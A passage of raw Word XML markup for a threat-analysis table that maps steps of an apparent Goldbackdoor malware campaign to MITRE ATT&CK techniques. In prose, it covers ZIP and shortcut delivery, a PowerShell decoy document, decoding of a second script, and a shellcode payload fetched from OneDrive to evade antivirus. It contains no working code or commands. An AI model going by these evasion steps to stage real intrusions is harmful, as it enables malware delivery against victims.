                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DA5851">
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>See above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A4AE0" w:rsidRPr="00E34A89" w14:paraId="362A43B0" w14:textId="77777777" w:rsidTr="00EC2E4B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69474483" w14:textId="794435C8" w:rsidR="008A4AE0" w:rsidRPr="005027B7" w:rsidRDefault="00DA5851" w:rsidP="008A4AE0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1402" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E1C3A4A" w14:textId="61732F65" w:rsidR="008A4AE0" w:rsidRPr="00E34A89" w:rsidRDefault="008A4AE0" w:rsidP="008A4AE0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>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293" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4BF52DE1" w14:textId="3E827047" w:rsidR="008A4AE0" w:rsidRPr="00E34A89" w:rsidRDefault="008A4AE0" w:rsidP="008A4AE0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>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41" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17EDFA77" w14:textId="3DE881B3" w:rsidR="008A4AE0" w:rsidRPr="00E34A89" w:rsidRDefault="00C518A9" w:rsidP="008A4AE0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C518A9">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="616" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1FAE6606" w14:textId="77777777" w:rsidR="008A4AE0" w:rsidRPr="00E34A89" w:rsidRDefault="008A4AE0" w:rsidP="008A4AE0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="556" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="008CAFE7" w14:textId="5BC4EEFD" w:rsidR="008A4AE0" w:rsidRPr="00E34A89" w:rsidRDefault="008A4AE0" w:rsidP="008A4AE0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3044DB7B" w14:textId="674CE0E4" w:rsidR="008A4AE0" w:rsidRPr="00E34A89" w:rsidRDefault="00EC2E4B" w:rsidP="008A4AE0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3516" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5CA4B7C1" w14:textId="498A35F7" w:rsidR="008A4AE0" w:rsidRPr="00E34A89" w:rsidRDefault="002E43E7" w:rsidP="008A4AE0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[5] </w:t>
            </w:r>
            <w:r w:rsidRPr="000E7841">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>In stage one, a victim must download a ZIP file from a compromised site, which executes a compressed Windows shortcut</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B7244F" w:rsidRPr="00B7244F" w14:paraId="5F9832EC" w14:textId="77777777" w:rsidTr="00EC2E4B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42A74CB9" w14:textId="55CC4311" w:rsidR="007B2061" w:rsidRPr="00B7244F" w:rsidRDefault="007B2061" w:rsidP="007B2061">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B7244F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1402" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="273724C8" w14:textId="1156F900" w:rsidR="007B2061" w:rsidRPr="00B7244F" w:rsidRDefault="007B2061" w:rsidP="007B2061">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B7244F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00B7244F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0002 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00B7244F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2293" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="098AE2C1" w14:textId="2E58A1E1" w:rsidR="007B2061" w:rsidRPr="00B7244F" w:rsidRDefault="00B7244F" w:rsidP="007B2061">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1059.001</w:t>
            </w:r>
            <w:r w:rsidR="007B2061" w:rsidRPr="00B7244F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="007B2061" w:rsidRPr="00B7244F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Command and Scripting Interpreter</w:t>
            </w:r>
            <w:r w:rsidR="007B2061" w:rsidRPr="00B7244F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> : </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Powershell</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3029AE47" w14:textId="20E99A73" w:rsidR="007B2061" w:rsidRPr="00B7244F" w:rsidRDefault="007B2061" w:rsidP="007B2061">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B7244F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="616" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A0F9B0E" w14:textId="77777777" w:rsidR="007B2061" w:rsidRPr="00B7244F" w:rsidRDefault="007B2061" w:rsidP="007B2061">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="556" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53BC49F1" w14:textId="455D2ECA" w:rsidR="007B2061" w:rsidRPr="00B7244F" w:rsidRDefault="007B2061" w:rsidP="007B2061">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B7244F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="796D84EE" w14:textId="53D5B168" w:rsidR="007B2061" w:rsidRPr="00B7244F" w:rsidRDefault="00EC2E4B" w:rsidP="007B2061">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3516" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79918B41" w14:textId="2BD93B98" w:rsidR="007B2061" w:rsidRPr="00B7244F" w:rsidRDefault="007B2061" w:rsidP="007B2061">
            <w:r w:rsidRPr="00B7244F">
              <w:t>[5] Upon execution, a PowerShell script launches and opens a decoy document (doc) for distraction while decoding a second script in the background.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E4622" w:rsidRPr="009E4622" w14:paraId="571BF8E6" w14:textId="77777777" w:rsidTr="00EC2E4B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7806197A" w14:textId="6081758C" w:rsidR="007B2061" w:rsidRPr="009E4622" w:rsidRDefault="007B2061" w:rsidP="007B2061">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009E4622">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1402" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D0C501D" w14:textId="1DBFCA62" w:rsidR="007B2061" w:rsidRPr="009E4622" w:rsidRDefault="007B2061" w:rsidP="007B2061">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009E4622">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009E4622">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>000</w:t>
            </w:r>
            <w:r w:rsidR="009E4622">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidRPr="009E4622">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009E4622">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="009E4622">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Defense</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="009E4622">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2293" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C6A267F" w14:textId="08E03480" w:rsidR="007B2061" w:rsidRPr="009E4622" w:rsidRDefault="009E4622" w:rsidP="007B2061">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009E4622">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009E4622">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1140</w:t>
            </w:r>
            <w:r w:rsidR="007B2061" w:rsidRPr="009E4622">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="007B2061" w:rsidRPr="009E4622">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009E4622">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Deobfuscate</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009E4622">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>/Decode Files or Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F53DEA9" w14:textId="51525B4A" w:rsidR="007B2061" w:rsidRPr="009E4622" w:rsidRDefault="00485C4E" w:rsidP="007B2061">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="616" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F91AB13" w14:textId="77777777" w:rsidR="007B2061" w:rsidRPr="009E4622" w:rsidRDefault="007B2061" w:rsidP="007B2061">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="556" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="325CBBCA" w14:textId="090D0166" w:rsidR="007B2061" w:rsidRPr="009E4622" w:rsidRDefault="007B2061" w:rsidP="007B2061">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009E4622">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A9CFD97" w14:textId="4263FE2B" w:rsidR="007B2061" w:rsidRPr="009E4622" w:rsidRDefault="00EC2E4B" w:rsidP="007B2061">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-DEV/NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3516" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="63B94F16" w14:textId="4C9F7C5D" w:rsidR="007B2061" w:rsidRPr="009E4622" w:rsidRDefault="007B2061" w:rsidP="007B2061">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009E4622">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>See above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00485C4E" w:rsidRPr="00B857D7" w14:paraId="31B08FC1" w14:textId="77777777" w:rsidTr="00EC2E4B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B76E888" w14:textId="0FC69E2B" w:rsidR="00485C4E" w:rsidRDefault="00485C4E" w:rsidP="00485C4E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00485C4E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1402" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BC34D4B" w14:textId="1DB638E4" w:rsidR="00485C4E" w:rsidRPr="00B857D7" w:rsidRDefault="00485C4E" w:rsidP="00485C4E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B7244F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00B7244F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0002 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00B7244F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2293" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E7936AC" w14:textId="72B156BF" w:rsidR="00485C4E" w:rsidRPr="00B857D7" w:rsidRDefault="00485C4E" w:rsidP="00485C4E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1059.001</w:t>
            </w:r>
            <w:r w:rsidRPr="00B7244F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00B7244F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Command and Scripting Interpreter</w:t>
            </w:r>
            <w:r w:rsidRPr="00B7244F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> : </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Powershell</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B334B36" w14:textId="70EC9778" w:rsidR="00485C4E" w:rsidRPr="00485C4E" w:rsidRDefault="00485C4E" w:rsidP="00485C4E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="616" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09D93195" w14:textId="77777777" w:rsidR="00485C4E" w:rsidRPr="00B857D7" w:rsidRDefault="00485C4E" w:rsidP="00485C4E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="556" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C4FE83C" w14:textId="475AE0D9" w:rsidR="00485C4E" w:rsidRDefault="00485C4E" w:rsidP="00485C4E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B7244F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="508D2E19" w14:textId="67AC18C6" w:rsidR="00485C4E" w:rsidRPr="00B857D7" w:rsidRDefault="00EC2E4B" w:rsidP="00485C4E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EC2E4B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3516" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2DD3D993" w14:textId="77777777" w:rsidR="00485C4E" w:rsidRDefault="00485C4E" w:rsidP="00485C4E">
            <w:r>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00C97663">
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">] </w:t>
            </w:r>
            <w:r w:rsidRPr="00485C4E">
              <w:t>The second script downloads and executes a shellcode payload stored on Microsoft OneDrive, a legitimate cloud-based file hosting service that is unlikely to generate AV alerts.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="532E48ED" w14:textId="7D192B3C" w:rsidR="00C97663" w:rsidRPr="00485C4E" w:rsidRDefault="00C97663" w:rsidP="00485C4E">
            <w:r w:rsidRPr="00C97663">
              <w:t xml:space="preserve">This payload is called “Fantasy,” and according to Stairwell, it’s the first of the two deploying mechanisms of </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C97663">
              <w:t>Goldbackdoor</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C97663">
              <w:t>, both relying on stealthy process injection.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00485C4E" w:rsidRPr="00B857D7" w14:paraId="49384BF4" w14:textId="77777777" w:rsidTr="00EC2E4B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="243FD22D" w14:textId="63BE4369" w:rsidR="00485C4E" w:rsidRDefault="00485C4E" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1402" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F6ECF15" w14:textId="3D6AB5BF" w:rsidR="00485C4E" w:rsidRPr="00B857D7" w:rsidRDefault="00485C4E" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00485C4E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00485C4E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00485C4E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Command and Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2293" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="190B1E17" w14:textId="1FF50087" w:rsidR="00485C4E" w:rsidRPr="00B857D7" w:rsidRDefault="00485C4E" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
